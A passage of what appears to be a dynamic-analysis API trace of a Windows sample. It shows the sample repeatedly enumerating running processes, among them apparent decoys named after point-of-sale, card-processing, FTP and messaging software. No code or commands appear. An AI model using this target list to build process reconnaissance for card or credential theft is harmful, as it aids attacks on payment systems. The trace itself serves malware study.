cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0245.193] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0245.195] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0245.197] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0245.198] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0245.203] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0245.205] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0245.207] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0245.209] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0245.210] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0245.212] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0245.214] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0245.346] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0245.349] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0245.351] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0245.353] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0245.355] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0245.376] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0245.397] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0245.399] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0245.401] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0245.407] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0245.409] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0245.411] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.413] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0245.415] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0245.417] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0245.489] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0245.491] CloseHandle (hObject=0x758) returned 1 [0245.492] Sleep (dwMilliseconds=0x64) [0245.630] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0245.648] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.650] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0245.652] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0245.658] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.660] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0245.662] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.663] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0245.665] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0245.667] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0245.673] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.675] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.677] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0245.679] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.681] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.683] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.703] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.704] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.706] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.707] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.709] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0245.711] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0245.712] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0245.714] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.718] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.720] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0245.721] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0245.723] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0245.724] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.726] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0245.727] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0245.729] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.730] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0245.737] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0245.739] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0245.741] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0245.742] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0245.744] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0245.745] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0245.803] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0245.805] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0245.807] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0245.813] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0245.815] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0245.817] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0245.820] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0245.822] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0245.824] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0245.830] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0245.832] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0245.834] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0245.837] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0245.839] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0245.892] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0245.895] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0245.897] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0245.899] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 